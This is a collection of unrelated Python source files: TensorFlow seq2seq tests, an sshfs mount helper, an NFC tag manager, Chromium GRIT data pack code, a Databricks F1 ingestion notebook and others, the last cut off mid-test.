# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for contrib.seq2seq.python.ops.seq2seq."""
# pylint: disable=unused-import,g-bad-import-order
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: enable=unused-import
import tensorflow as tf
from tensorflow.contrib import layers
class Seq2SeqTest(tf.test.TestCase):
# test a default call of rnn_decoder
def test_rnn_decoder(self):
pass
# test default call with time_major=True
def test_dynamic_rnn_decoder_time_major(self):
with self.test_session() as sess:
with tf.variable_scope("root", initializer=
tf.constant_initializer(0.5)) as varscope:
# Define inputs/outputs to model
batch_size = 2
encoder_embedding_size = 3
decoder_embedding_size = 4
encoder_hidden_size = 5
decoder_hidden_size = encoder_hidden_size
input_sequence_length = 6
decoder_sequence_length = 7
num_decoder_symbols = 20
start_of_sequence_id = end_of_sequence_id = 1
decoder_embeddings = tf.get_variable('decoder_embeddings',
[num_decoder_symbols, decoder_embedding_size],
initializer=tf.random_normal_initializer(stddev=0.1))
inputs = tf.constant(0.5, shape=[input_sequence_length, batch_size,
encoder_embedding_size])
decoder_inputs = tf.constant(0.4, shape=[decoder_sequence_length,
batch_size,
decoder_embedding_size])
decoder_length = tf.constant(decoder_sequence_length, dtype=tf.int32,
shape=[batch_size,])
with tf.variable_scope("rnn") as scope:
# setting up weights for computing the final output
output_fn = lambda x: layers.linear(x, num_decoder_symbols,
scope=scope)
# Define model
encoder_outputs, encoder_state = tf.nn.dynamic_rnn(
cell=tf.nn.rnn_cell.GRUCell(encoder_hidden_size), inputs=inputs,
dtype=tf.float32, time_major=True, scope=scope)
with tf.variable_scope("decoder") as scope:
# Train decoder
decoder_cell = tf.nn.rnn_cell.GRUCell(decoder_hidden_size)
decoder_fn_train = tf.contrib.seq2seq.simple_decoder_fn_train(
encoder_state=encoder_state)
decoder_outputs_train, decoder_state_train = (
tf.contrib.seq2seq.dynamic_rnn_decoder(
cell=decoder_cell,
decoder_fn=decoder_fn_train,
inputs=decoder_inputs,
sequence_length=decoder_length,
time_major=True,
scope=scope))
decoder_outputs_train = output_fn(decoder_outputs_train)
# Setup variable reuse
scope.reuse_variables()
# Inference decoder
decoder_fn_inference = (
tf.contrib.seq2seq.simple_decoder_fn_inference(
output_fn=output_fn,
encoder_state=encoder_state,
embeddings=decoder_embeddings,
start_of_sequence_id=start_of_sequence_id,
end_of_sequence_id=end_of_sequence_id,
#TODO: find out why it goes to +1
maximum_length=decoder_sequence_length-1,
num_decoder_symbols=num_decoder_symbols,
dtype=tf.int32))
decoder_outputs_inference, decoder_state_inference = (
tf.contrib.seq2seq.dynamic_rnn_decoder(
cell=decoder_cell,
decoder_fn=decoder_fn_inference,
time_major=True,
scope=scope))
# Run model
tf.global_variables_initializer().run()
decoder_outputs_train_res, decoder_state_train_res = sess.run(
[decoder_outputs_train, decoder_state_train])
decoder_outputs_inference_res, decoder_state_inference_res = sess.run(
[decoder_outputs_inference, decoder_state_inference])
# Assert outputs
self.assertEqual((decoder_sequence_length, batch_size,
num_decoder_symbols),
decoder_outputs_train_res.shape)
self.assertEqual((batch_size, num_decoder_symbols),
decoder_outputs_inference_res.shape[1:3])
self.assertEqual((batch_size, decoder_hidden_size),
decoder_state_train_res.shape)
self.assertEqual((batch_size, decoder_hidden_size),
decoder_state_inference_res.shape)
# The dynamic decoder might end earlier than `maximum_length`
# under inference
true_value = (decoder_sequence_length>=
decoder_state_inference_res.shape[0])
self.assertEqual((true_value), True)
if __name__ == '__main__':
tf.test.main()
|
from edb import Resource
import json
# Create resources in the database. Does nothing if they already exist.
# For convenience, create() returns the Resource object.
my_list: list = Resource("my_list").create(list())
my_dictionary: dict = Resource("my_dictionary").create(dict())
# Dictionary
my_dictionary["a_new_key"] = "my_value"
print(
my_dictionary["a_new_key"], # This returns as expected 'my_value'
len(my_dictionary), # Returns 1 (there is one key in the dictionary)
)
my_dictionary.delete() # This deletes the resource on the server and returns None
# List
for i in "abcdefghij":
my_list.append(i)
print(
len(my_list), # Returns 10
my_list[4], # Returns e
my_list[3:], # Returns ['d', 'e', 'f', 'g', 'h', 'i', 'j']
)
# Updating a resource when the elements point to a collection type.
# For now you will have to get the element, update it locally and then update the database with the new data.
new_list = Resource("new_list").create(list())
new_list.append([1, 2, 3])
print(new_list) # Returns [[1, 2, 3]]
# Extend the element
l = new_list[0] # Create a local copy
l.extend([4, 5, 6]) # Update the element locally
new_list[0] = l # Update the database
print(new_list) # Returns [[1, 2, 3, 4, 5, 6]]
# Example with dictionary in list resource
users = Resource("users").create(list())
for i in range(3):
user = {
"id": i,
"name": "Trololo Guy",
}
users.append(user)
print(
users
) # [{'id': 0, 'name': 'Trololo Guy'}, {'id': 1, 'name': 'Trololo Guy'}, {'id': 2, 'name': 'Trololo Guy'}]
|
import os
import subprocess
from huntsman.pocs.utils import DummyLogger
from huntsman.pocs.utils.config import query_config_server, load_device_config
def mount(mountpoint, remote, server_alive_interval=20, logger=None,
server_alive_count_max=3, strict_host_key_checking=False):
'''
Mount remote on local.
Arguments
---------
strict_host_key_checking:
Should be False to avoid user interaction when running in a docker
container.
'''
if logger is None:
logger = DummyLogger()
logger.debug(f'Mounting {remote} on {mountpoint}...')
try:
os.makedirs(mountpoint, exist_ok=True)
except FileExistsError:
pass # For some reason this is necessary
# SSH options
strict_host_key_checking = "yes" if strict_host_key_checking else "no"
options = f'ServerAliveInterval={server_alive_interval},' + \
f'ServerAliveCountMax={server_alive_count_max},' + \
f'StrictHostKeyChecking={strict_host_key_checking}'
options = ['sshfs', remote, mountpoint, '-o', options]
try:
subprocess.run(options, shell=False, check=True)
logger.info(f'Successfully mounted {remote} at {mountpoint}!')
except Exception as e:
logger.error(f'Failed to mount {remote} at {mountpoint}: {e}')
raise e
def unmount(mountpoint, logger=None):
'''
Unmount remote from local.
'''
if os.path.isdir(mountpoint):
options = ['fusermount', '-u', mountpoint]
try:
subprocess.run(options, shell=False, check=True)
except Exception:
if logger is None:
logger = DummyLogger()
logger.warning(f'Unable to unmount {mountpoint}.')
def get_user(default='huntsman', key='PANUSER', logger=None):
'''
Return the user.
'''
if key in os.environ:
user = os.environ[key]
else:
user = default
msg = f'{key} environment variable not found. Using {default} as user.'
if logger is None:
logger = DummyLogger()
logger.warning(msg)
return user
def mount_images_dir(logger=None, user=None, mountpoint=None, config=None,
**kwargs):
'''
Mount the images directory from the NGAS server to the local device.
'''
# Setup the logger
if logger is None:
logger = DummyLogger()
# Load the config
if config is None:
config = load_device_config(logger=logger, **kwargs)
# Specify user for SSHFS connection
if user is None:
user = get_user(logger=logger)
# Specify the mount point on the local device
if mountpoint is None:
mountpoint = config['directories']['images']
# Retrieve the IP of the remote
remote_ip = query_config_server(key='control', logger=logger)['ip_address']
# Specify the remote directory
remote_dir = query_config_server(key='control',
logger=logger)['directories']['images']
remote = f"{user}@{remote_ip}:{remote_dir}"
# Mount
mount(mountpoint, remote, logger=logger)
return mountpoint
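# A minimal usage sketch, not part of the original module. It assumes a
# reachable control/NGAS server and a valid device config on this machine;
# error handling is omitted for brevity.
#
#   from huntsman.pocs.utils import DummyLogger
#
#   logger = DummyLogger()
#   images_dir = mount_images_dir(logger=logger)
#   # ... use the mounted directory ...
#   unmount(images_dir, logger=logger)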
|
import json
import logging
import os
import time
import yaml
from .socketio import socketio
from .models import db, NFCTagModel
from flask import current_app
from musicfig import colors
from sqlalchemy import func
logger = logging.getLogger(__name__)
# all uses of current_app in here are for config; try just passing those
# config values, mayhap?
class NFCTagOperationError(BaseException):
pass
class NFCTag():
@classmethod
def get_friendly_name(cls):
"""
Hacky, but effective, way to get the friendly name of this class.
Brittle because it assumes the class name ends in "Tag";
override if that assumption does not hold.
"""
return cls.__name__[0:-3].lower()
@classmethod
def _get_required_attributes(cls):
return cls.required_attributes if hasattr(cls, 'required_attributes') else []
@classmethod
def get_attributes_description(cls):
json_content = ",".join(['"%s": "..."' % att for att in cls._get_required_attributes()])
return "{%s}" % json_content
def __init__(self, identifier, name=None, description=None, attributes=None, **kwargs):
self.identifier = identifier
self.name = name
self.description = description
self.attributes = attributes if attributes is not None else {}
self.logger = logging.getLogger("musicfig")
self._init_attributes()
def _init_attributes(self):
self._verify_attributes()
def _verify_attributes(self):
# unclear if this will work...
for required_attribute in self._get_required_attributes():
if required_attribute not in self.attributes:
raise KeyError("missing required key '%s'" % required_attribute)
def get_type(self):
return self.__class__.__name__.replace("Tag", "").lower()
def on_add(self):
pass
def on_remove(self):
pass
def get_pad_color(self):
return colors.OFF
def should_do_light_show(self):
return True
def should_use_class_based_execution(self):
return True
class UnregisteredTag(NFCTag):
"""
This is used for tags which have not been added to the database
"""
def on_add(self):
super().on_add()
# should _probably_ use a logger which is associated with the
# app, but this is fine for now. Maybe
logger.info('Discovered new tag: %s' % self.identifier)
socketio.emit("new_tag", {"tag_id": self.identifier})
def get_pad_color(self):
return colors.RED
class UnknownTypeTag(NFCTag):
"""
This is used in cases where tags are persisted to the database but then a plugin is removed
or unregistered; those orphan tags will be represented by this type
"""
def get_pad_color(self):
return colors.RED
def should_use_class_based_execution(self):
return False
class NFCTagStore():
tag_cache = {}
@staticmethod
def get_last_updated_time():
latest_nfc_tag = NFCTagModel.query.order_by(NFCTagModel.last_updated.desc()).first()
return 0 if latest_nfc_tag is None else latest_nfc_tag.last_updated
@staticmethod
def get_number_of_nfc_tags():
return db.session.query(func.count(NFCTagModel.id)).scalar()
@staticmethod
def populate_from_dict(nfc_tag_dict):
"""
Expects nfc tag dict with the keys as unique identifiers and the
values as the configuration information. This will be parsed and
certain keywords will be pulled into explicit fields and removed
from the config:
- name or _name (the former overrules) -> `name`
- desc or description (the latter overrules) -> `description`
- type -> `type`
Everything that is remaining will be encoded as json and stored in
the `attr` field
"""
before = NFCTagStore.get_number_of_nfc_tags()
def convert_one(k, v, curtime):
id = k
# these double-pops actually pull both of the keys from the dictionary;
# this is intentional as we don't want them to stick around afterward
name = v.pop("name", v.pop("_name", None))
desc = v.pop("description", v.pop("desc", None))
nfc_tag_type = v.pop("type", None)
attr = json.dumps(v)
return NFCTagModel(id=id, name=name, description=desc,
type=nfc_tag_type, attr=attr, last_updated=curtime)
cur_time = NFCTagStore.get_current_timestamp()
for k, v in nfc_tag_dict.items():
nfc_tag_model = convert_one(k, v, cur_time)
db.session.add(nfc_tag_model)
db.session.commit()
after = NFCTagStore.get_number_of_nfc_tags()
logger.info("added %s tags; before: %s, after: %s", len(nfc_tag_dict.items()), before, after)
@staticmethod
def get_current_timestamp():
return int(time.time())
@staticmethod
def get_all_nfc_tags():
return NFCTagModel.query.all()
@staticmethod
def get_nfc_tag_by_id(id):
return NFCTagModel.query.filter(NFCTagModel.id == id).first()
@staticmethod
def delete_nfc_tag_by_id(id):
to_delete = NFCTagModel.query.filter(NFCTagModel.id == id).first()
db.session.delete(to_delete)
db.session.commit()
return True
@staticmethod
def create_nfc_tag(id, type, name=None, description=None, attributes=None):
model = NFCTagModel(id=id, name=name, description=description, type=type,
attr=attributes, last_updated=NFCTagStore.get_current_timestamp())
db.session.add(model)
db.session.commit()
return model
class NFCTagManager():
# todo; merge this class with NFCTagStore
def __init__(self):
self.nfc_tags_file = current_app.config.get("NFC_TAG_FILE")
self.last_updated = -1
self.tags = {}
self._tags = {}
if self.should_import_file():
self.import_file()
instance = None
@classmethod
def get_instance(cls):
if cls.instance is None:
cls.instance = NFCTagManager()
return cls.instance
TAG_REGISTRY_MAP = {}
@classmethod
def register_tag_type(cls, nfc_tag_class):
if not issubclass(nfc_tag_class, NFCTag):
raise TypeError("`nfc_tag_class` must be a class object which extends NFCTag")
cls.TAG_REGISTRY_MAP[nfc_tag_class.get_friendly_name()] = nfc_tag_class
@classmethod
def get_tag_class_from_tag_type(cls, nfc_tag_type: str):
return cls.TAG_REGISTRY_MAP.get(nfc_tag_type, UnknownTypeTag)
@classmethod
def get_registered_tag_types(cls):
"""
Fetches a dictionary of all the registered tag types in the format `type_str` -> `type_class_obj`
Note
"""
return cls.TAG_REGISTRY_MAP
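# Registration sketch (WebhookTag below is a hypothetical plugin class, not
# part of this module). get_friendly_name() strips the trailing "Tag", so the
# registered type string becomes "webhook":
#
#   class WebhookTag(NFCTag):
#       required_attributes = ["url"]
#
#   NFCTagManager.register_tag_type(WebhookTag)
#   NFCTagManager.get_tag_class_from_tag_type("webhook")  # -> WebhookTag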
def should_import_file(self):
"""
This is not a super smart way of doing things, but it should work. tl;dr,
if the modified time of the yaml file is more recent than the most recent
modified time of any nfc_tag in the db, then we should update.
*** note, this is destructive in nature; yaml will completely overwrite
the database ***
"""
if not os.path.isfile(self.nfc_tags_file):
return False
last_db_update = NFCTagStore.get_last_updated_time()
last_file_update = int(os.stat(self.nfc_tags_file).st_mtime)
logger.info("last db updated: %s, last file updated: %s", last_db_update, last_file_update)
return last_file_update > last_db_update
def import_file(self):
with open(self.nfc_tags_file, 'r') as f:
nfc_tag_defs = yaml.load(f, Loader=yaml.FullLoader)
NFCTagStore.populate_from_dict(nfc_tag_defs)
def nfc_tag_from_model(self, nfc_tag_model):
# TODO build a composite tag in case we want to do e.g. spotify + webhook;
# perhaps do a list of types or something?
nfc_tag_class = NFCTagManager.get_tag_class_from_tag_type(nfc_tag_model.type)
return nfc_tag_class(nfc_tag_model.id,
name=nfc_tag_model.name,
description=nfc_tag_model.description,
attributes=nfc_tag_model.get_attr_object()
)
def get_nfc_tag_by_id(self, id):
"""
Looks everywhere for a tag which is registered. Will return either
old-style or new-style tags, depending on which store it comes from.
New style will override old style
"""
if id not in self.tags:
nfc_tag_model = NFCTagStore.get_nfc_tag_by_id(id)
if nfc_tag_model is None:
nfc_tag = UnregisteredTag(id)
else:
nfc_tag = self.nfc_tag_from_model(nfc_tag_model)
logger.debug("built tag of type %s from info %s", type(nfc_tag), nfc_tag_model)
self.tags[id] = nfc_tag
return self.tags.get(id)
def delete_nfc_tag_by_id(self, id):
if id is None:
return
self.tags.pop(id, None)
success = NFCTagStore.delete_nfc_tag_by_id(id)
socketio.emit("tag_deleted", {"tag_id": id})
def create_nfc_tag(self, id, tag_type, name=None, description=None, attributes=None):
if id is None or tag_type is None:
raise ValueError("must include both id and tag_type")
if NFCTagManager.get_tag_class_from_tag_type(tag_type) is UnknownTypeTag:
raise ValueError("tag_type was %s, must be one of the following: [%s]",
tag_type, "],[".join(NFCTagManager.get_registered_tag_types().keys()))
if isinstance(attributes, dict):
attributes = json.dumps(attributes)
model_obj = NFCTagStore.create_nfc_tag(id, tag_type, name, description, attributes)
nfc_tag = self.nfc_tag_from_model(model_obj)
self.tags[id] = nfc_tag
return nfc_tag
|
import pytest
from trydjango.users.models import User
from trydjango.users.tests.factories import UserFactory
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
return UserFactory()
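# Usage sketch (hypothetical test module; assumes pytest-django is configured
# for this project so the factory can hit the test database):
#
#   import pytest
#
#   pytestmark = pytest.mark.django_db
#
#   def test_user_str(user: User):
#       assert str(user)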
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Support for formatting a data pack file used for platform agnostic resource
files.
"""
from __future__ import print_function
import collections
import os
import struct
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import six
from grit import util
from grit.node import include
from grit.node import message
from grit.node import structure
PACK_FILE_VERSION = 5
BINARY, UTF8, UTF16 = range(3)
GrdInfoItem = collections.namedtuple('GrdInfoItem',
['textual_id', 'id', 'path'])
class WrongFileVersion(Exception):
pass
class CorruptDataPack(Exception):
pass
class DataPackSizes(object):
def __init__(self, header, id_table, alias_table, data):
self.header = header
self.id_table = id_table
self.alias_table = alias_table
self.data = data
@property
def total(self):
return sum(v for v in self.__dict__.values())
def __iter__(self):
yield ('header', self.header)
yield ('id_table', self.id_table)
yield ('alias_table', self.alias_table)
yield ('data', self.data)
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __repr__(self):
return self.__class__.__name__ + repr(self.__dict__)
class DataPackContents(object):
def __init__(self, resources, encoding, version, aliases, sizes):
# Map of resource_id -> str.
self.resources = resources
# Encoding (int).
self.encoding = encoding
# Version (int).
self.version = version
# Map of resource_id->canonical_resource_id
self.aliases = aliases
# DataPackSizes instance.
self.sizes = sizes
def Format(root, lang='en', output_dir='.'):
"""Writes out the data pack file format (platform agnostic resource file)."""
id_map = root.GetIdMap()
data = {}
root.info = []
for node in root.ActiveDescendants():
with node:
if isinstance(node, (include.IncludeNode, message.MessageNode,
structure.StructureNode)):
value = node.GetDataPackValue(lang, util.BINARY)
if value is not None:
resource_id = id_map[node.GetTextualIds()[0]]
data[resource_id] = value
root.info.append('{},{},{}'.format(
node.attrs.get('name'), resource_id, node.source))
return WriteDataPackToString(data, UTF8)
def ReadDataPack(input_file):
return ReadDataPackFromString(util.ReadFile(input_file, util.BINARY))
def ReadDataPackFromString(data):
"""Reads a data pack file and returns a dictionary."""
# Read the header.
version = struct.unpack('<I', data[:4])[0]
if version == 4:
resource_count, encoding = struct.unpack('<IB', data[4:9])
alias_count = 0
header_size = 9
elif version == 5:
encoding, resource_count, alias_count = struct.unpack('<BxxxHH', data[4:12])
header_size = 12
else:
raise WrongFileVersion('Found version: ' + str(version))
resources = {}
kIndexEntrySize = 2 + 4 # Each entry is a uint16 and a uint32.
def entry_at_index(idx):
offset = header_size + idx * kIndexEntrySize
return struct.unpack('<HI', data[offset:offset + kIndexEntrySize])
prev_resource_id, prev_offset = entry_at_index(0)
for i in range(1, resource_count + 1):
resource_id, offset = entry_at_index(i)
resources[prev_resource_id] = data[prev_offset:offset]
prev_resource_id, prev_offset = resource_id, offset
id_table_size = (resource_count + 1) * kIndexEntrySize
# Read the alias table.
kAliasEntrySize = 2 + 2 # uint16, uint16
def alias_at_index(idx):
offset = header_size + id_table_size + idx * kAliasEntrySize
return struct.unpack('<HH', data[offset:offset + kAliasEntrySize])
aliases = {}
for i in range(alias_count):
resource_id, index = alias_at_index(i)
aliased_id = entry_at_index(index)[0]
aliases[resource_id] = aliased_id
resources[resource_id] = resources[aliased_id]
alias_table_size = kAliasEntrySize * alias_count
sizes = DataPackSizes(
header_size, id_table_size, alias_table_size,
len(data) - header_size - id_table_size - alias_table_size)
assert sizes.total == len(data), 'original={} computed={}'.format(
len(data), sizes.total)
return DataPackContents(resources, encoding, version, aliases, sizes)
def WriteDataPackToString(resources, encoding):
"""Returns bytes with a map of id=>data in the data pack format."""
ret = []
# Compute alias map.
resource_ids = sorted(resources)
# Use reversed() so that for duplicates lower IDs clobber higher ones.
id_by_data = {resources[k]: k for k in reversed(resource_ids)}
# Map of resource_id -> resource_id, where value < key.
alias_map = {k: id_by_data[v] for k, v in resources.items()
if id_by_data[v] != k}
# Write file header.
resource_count = len(resources) - len(alias_map)
# Padding bytes added for alignment.
ret.append(struct.pack('<IBxxxHH', PACK_FILE_VERSION, encoding,
resource_count, len(alias_map)))
HEADER_LENGTH = 4 + 4 + 2 + 2
# Each main table entry is: uint16 + uint32 (and an extra entry at the end).
# Each alias table entry is: uint16 + uint16.
data_offset = HEADER_LENGTH + (resource_count + 1) * 6 + len(alias_map) * 4
# Write main table.
index_by_id = {}
deduped_data = []
index = 0
for resource_id in resource_ids:
if resource_id in alias_map:
continue
data = resources[resource_id]
if isinstance(data, six.text_type):
data = data.encode('utf-8')
index_by_id[resource_id] = index
ret.append(struct.pack('<HI', resource_id, data_offset))
data_offset += len(data)
deduped_data.append(data)
index += 1
assert index == resource_count
# Add an extra entry at the end.
ret.append(struct.pack('<HI', 0, data_offset))
# Write alias table.
for resource_id in sorted(alias_map):
index = index_by_id[alias_map[resource_id]]
ret.append(struct.pack('<HH', resource_id, index))
# Write data.
ret.extend(deduped_data)
return b''.join(ret)
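# A round-trip sketch, not part of the original module (the resource IDs below
# are arbitrary). Duplicate payloads are stored once and exposed via `aliases`:
#
#   pak = WriteDataPackToString({10: 'hello', 20: 'hello', 30: 'world'}, UTF8)
#   contents = ReadDataPackFromString(pak)
#   assert contents.version == PACK_FILE_VERSION
#   assert contents.resources[10] == contents.resources[20] == b'hello'
#   assert contents.aliases == {20: 10}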
def WriteDataPack(resources, output_file, encoding):
"""Writes a map of id=>data into output_file as a data pack."""
content = WriteDataPackToString(resources, encoding)
with open(output_file, 'wb') as file:
file.write(content)
def ReadGrdInfo(grd_file):
info_dict = {}
with open(grd_file + '.info', 'rt') as f:
for line in f:
item = GrdInfoItem._make(line.strip().split(','))
info_dict[int(item.id)] = item
return info_dict
def RePack(output_file, input_files, whitelist_file=None,
suppress_removed_key_output=False,
output_info_filepath=None):
"""Write a new data pack file by combining input pack files.
Args:
output_file: path to the new data pack file.
input_files: a list of paths to the data pack files to combine.
whitelist_file: path to the file that contains the list of resource IDs
that should be kept in the output file or None to include
all resources.
suppress_removed_key_output: allows the caller to suppress the output from
RePackFromDataPackStrings.
output_info_filepath: If not None, specifies the output .info filepath.
Raises:
KeyError: if there are duplicate keys or resource encoding is
inconsistent.
"""
input_data_packs = [ReadDataPack(filename) for filename in input_files]
input_info_files = [filename + '.info' for filename in input_files]
whitelist = None
if whitelist_file:
lines = util.ReadFile(whitelist_file, 'utf-8').strip().splitlines()
if not lines:
raise Exception('Whitelist file should not be empty')
whitelist = set(int(x) for x in lines)
inputs = [(p.resources, p.encoding) for p in input_data_packs]
resources, encoding = RePackFromDataPackStrings(
inputs, whitelist, suppress_removed_key_output)
WriteDataPack(resources, output_file, encoding)
if output_info_filepath is None:
output_info_filepath = output_file + '.info'
with open(output_info_filepath, 'w') as output_info_file:
for filename in input_info_files:
with open(filename, 'r') as info_file:
output_info_file.writelines(info_file.readlines())
def RePackFromDataPackStrings(inputs, whitelist,
suppress_removed_key_output=False):
"""Combines all inputs into one.
Args:
inputs: a list of (resources_by_id, encoding) tuples to be combined.
whitelist: a list of resource IDs that should be kept in the output string
or None to include all resources.
suppress_removed_key_output: Do not print removed keys.
Returns:
Returns (resources_by_id, encoding).
Raises:
KeyError: if there are duplicate keys or resource encoding is
inconsistent.
"""
resources = {}
encoding = None
for input_resources, input_encoding in inputs:
# Make sure we have no dups.
duplicate_keys = set(input_resources.keys()) & set(resources.keys())
if duplicate_keys:
raise KeyError('Duplicate keys: ' + str(list(duplicate_keys)))
# Make sure encoding is consistent.
if encoding in (None, BINARY):
encoding = input_encoding
elif input_encoding not in (BINARY, encoding):
raise KeyError('Inconsistent encodings: ' + str(encoding) +
' vs ' + str(input_encoding))
if whitelist:
whitelisted_resources = dict([(key, input_resources[key])
for key in input_resources.keys()
if key in whitelist])
resources.update(whitelisted_resources)
removed_keys = [key for key in input_resources.keys()
if key not in whitelist]
if not suppress_removed_key_output:
for key in removed_keys:
print('RePackFromDataPackStrings Removed Key:', key)
else:
resources.update(input_resources)
# Encoding is 0 for BINARY, 1 for UTF8 and 2 for UTF16
if encoding is None:
encoding = BINARY
return resources, encoding
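# Sketch of combining two in-memory packs with a whitelist (IDs and payloads
# below are illustrative):
#
#   merged, enc = RePackFromDataPackStrings(
#       [({1: b'a', 2: b'b'}, UTF8), ({3: b'c'}, UTF8)], whitelist={1, 3})
#   # merged == {1: b'a', 3: b'c'}; key 2 is reported as removed.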
def main():
# Write a simple file.
data = {1: '', 4: 'this is id 4', 6: 'this is id 6', 10: ''}
WriteDataPack(data, 'datapack1.pak', UTF8)
data2 = {1000: 'test', 5: 'five'}
WriteDataPack(data2, 'datapack2.pak', UTF8)
print('wrote datapack1 and datapack2 to current directory.')
if __name__ == '__main__':
main()
|
# Databricks notebook source
# MAGIC %md
# MAGIC ### Ingest results.json file
# COMMAND ----------
dbutils.widgets.text("p_data_source", "")
v_data_source = dbutils.widgets.get("p_data_source")
# COMMAND ----------
dbutils.widgets.text("p_file_date", "2021-03-28")
v_file_date = dbutils.widgets.get("p_file_date")
# COMMAND ----------
# MAGIC %run "../includes/configuration"
# COMMAND ----------
# MAGIC %run "../includes/common_functions"
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 1 - Read the JSON file using the spark dataframe reader API
# COMMAND ----------
from pyspark.sql.types import StructType, StructField, IntegerType, StringType, FloatType
# COMMAND ----------
results_schema = StructType(fields=[StructField("resultId", IntegerType(), False),
StructField("raceId", IntegerType(), True),
StructField("driverId", IntegerType(), True),
StructField("constructorId", IntegerType(), True),
StructField("number", IntegerType(), True),
StructField("grid", IntegerType(), True),
StructField("position", IntegerType(), True),
StructField("positionText", StringType(), True),
StructField("positionOrder", IntegerType(), True),
StructField("points", FloatType(), True),
StructField("laps", IntegerType(), True),
StructField("time", StringType(), True),
StructField("milliseconds", IntegerType(), True),
StructField("fastestLap", IntegerType(), True),
StructField("rank", IntegerType(), True),
StructField("fastestLapTime", StringType(), True),
StructField("fastestLapSpeed", FloatType(), True),
StructField("statusId", StringType(), True)])
# COMMAND ----------
results_df = spark.read \
.schema(results_schema) \
.json(f"{raw_folder_path}/{v_file_date}/results.json")
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 2 - Rename columns and add new columns
# COMMAND ----------
from pyspark.sql.functions import lit
# COMMAND ----------
results_with_columns_df = results_df.withColumnRenamed("resultId", "result_id") \
.withColumnRenamed("raceId", "race_id") \
.withColumnRenamed("driverId", "driver_id") \
.withColumnRenamed("constructorId", "constructor_id") \
.withColumnRenamed("positionText", "position_text") \
.withColumnRenamed("positionOrder", "position_order") \
.withColumnRenamed("fastestLap", "fastest_lap") \
.withColumnRenamed("fastestLapTime", "fastest_lap_time") \
.withColumnRenamed("fastestLapSpeed", "fastest_lap_speed") \
.withColumn("data_source", lit(v_data_source)) \
.withColumn("file_date", lit(v_file_date))
# COMMAND ----------
results_with_ingestion_date_df = add_ingestion_date(results_with_columns_df)
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 3 - Drop the unwanted column
# COMMAND ----------
from pyspark.sql.functions import col
# COMMAND ----------
results_final_df = results_with_ingestion_date_df.drop(col("statusId"))
# COMMAND ----------
# MAGIC %md
# MAGIC De-dupe the dataframe
# COMMAND ----------
results_deduped_df = results_final_df.dropDuplicates(['race_id', 'driver_id'])
# COMMAND ----------
# MAGIC %md
# MAGIC ##### Step 4 - Write the output to the processed container in parquet format
# COMMAND ----------
# MAGIC %md
# MAGIC Method 1
# COMMAND ----------
# for race_id_list in results_final_df.select("race_id").distinct().collect():
# if (spark._jsparkSession.catalog().tableExists("f1_processed.results")):
# spark.sql(f"ALTER TABLE f1_processed.results DROP IF EXISTS PARTITION (race_id = {race_id_list.race_id})")
# COMMAND ----------
# results_final_df.write.mode("append").partitionBy('race_id').format("parquet").saveAsTable("f1_processed.results")
# COMMAND ----------
# MAGIC %md
# MAGIC Method 2
# COMMAND ----------
# overwrite_partition(results_final_df, 'f1_processed', 'results', 'race_id')
# COMMAND ----------
merge_condition = "tgt.result_id = src.result_id AND tgt.race_id = src.race_id"
merge_delta_data(results_deduped_df, 'f1_processed', 'results', processed_folder_path, merge_condition, 'race_id')
# COMMAND ----------
dbutils.notebook.exit("Success")
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT COUNT(1)
# MAGIC FROM f1_processed.results;
# COMMAND ----------
# MAGIC %sql
# MAGIC SELECT race_id, driver_id, COUNT(1)
# MAGIC FROM f1_processed.results
# MAGIC GROUP BY race_id, driver_id
# MAGIC HAVING COUNT(1) > 1
# MAGIC ORDER BY race_id, driver_id DESC;
# COMMAND ----------
# MAGIC %sql SELECT * FROM f1_processed.results WHERE race_id = 540 AND driver_id = 229;
# COMMAND ----------
|
import logging
from pyvisdk.exceptions import InvalidArgumentError
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
def SnapshotFault(vim, *args, **kwargs):
'''Base type for Snapshot-related errors.'''
obj = vim.client.factory.create('{urn:vim25}SnapshotFault')
# do some validation checking...
if (len(args) + len(kwargs)) < 4:
raise IndexError('Expected at least 4 arguments got: %d' % (len(args) + len(kwargs)))
required = [ 'dynamicProperty', 'dynamicType', 'faultCause', 'faultMessage' ]
optional = [ ]
for name, arg in zip(required+optional, args):
setattr(obj, name, arg)
for name, value in kwargs.items():
if name in required + optional:
setattr(obj, name, value)
else:
raise InvalidArgumentError("Invalid argument: %s. Expected one of %s" % (name, ", ".join(required + optional)))
return obj
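# Hypothetical usage sketch (assumes an authenticated pyvisdk `vim` service
# instance; the argument values are placeholders). Positional args are mapped
# onto the required attribute names in order:
#
#   fault = SnapshotFault(vim, [], 'SnapshotFault', None, [])
#   # sets dynamicProperty, dynamicType, faultCause and faultMessage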
|
# -*- coding: utf-8 -*-
'''
Tests for the rabbitmq state
'''
# Import python libs
from __future__ import absolute_import
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import skip_if_not_root
from tests.support.mixins import SaltReturnAssertsMixin
@skip_if_not_root
class RabbitVHostTestCase(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the rabbitmq virtual host states.
'''
def setUp(self):
super(RabbitVHostTestCase, self).setUp()
rabbit_installed = self.run_function('cmd.has_exec', ['rabbitmqctl'])
if not rabbit_installed:
self.skipTest('rabbitmq-server not installed')
def test_present(self):
'''
rabbitmq_vhost.present null_host
'''
ret = self.run_state(
'rabbitmq_vhost.present', name='null_host', test=True
)
self.assertSaltFalseReturn(ret)
def test_absent(self):
'''
